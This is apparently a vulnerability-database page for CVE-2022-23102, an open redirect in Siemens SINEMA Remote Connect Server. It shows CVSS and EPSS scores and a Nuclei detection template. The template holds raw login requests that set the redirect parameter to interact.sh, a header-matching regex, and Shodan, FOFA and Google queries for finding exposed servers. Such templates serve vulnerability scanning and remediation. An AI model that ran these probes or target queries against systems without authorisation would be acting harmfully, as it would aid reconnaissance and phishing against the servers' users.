Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23102
HistoryJun 15, 2023 - 7:06 a.m.

SINEMA Remote Connect Server < V2.0 - Open Redirect

2023-06-1507:06:37
ProjectDiscovery
github.com
19
cve
cve2022
packetstorm
seclists
redirect
sinema
authenticated
siemens

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6

Confidence

High

EPSS

0.004

Percentile

75.3%

A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
id: CVE-2022-23102

info:
  name: SINEMA Remote Connect Server < V2.0 - Open Redirect
  author: ctflearner,ritikchaddha
  severity: medium
  description: |
    A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  remediation: |
    Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-23102
    - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html
    - https://seclists.org/fulldisclosure/2022/Feb/20
    - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23102
    cwe-id: CWE-601
    epss-score: 0.00366
    epss-percentile: 0.71925
    cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: siemens
    product: sinema_remote_connect_server
    shodan-query:
      - title:"Logon - SINEMA Remote Connect"
      - http.title:"logon - sinema remote connect"
    fofa-query: title="logon - sinema remote connect"
    google-query: intitle:"logon - sinema remote connect"
  tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens

http:
  - raw:
      - |
        GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: csrftoken={{csrf}};
        Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh

        csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - "name='csrfmiddlewaretoken' value='(.*)' />"
        internal: true
# digest: 490a00463044022079cc33f1cc908eef893230c347c8ce3e8f124d6750ac529661e567415a67261b02203dd96b6f3671048cf76f1864b1a4ff0e738a9c4960b867fc5ebc35298261b9c3:922c64590222798bb761d5b6d8e72950

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6

Confidence

High

EPSS

0.004

Percentile

75.3%

Related for NUCLEI:CVE-2022-23102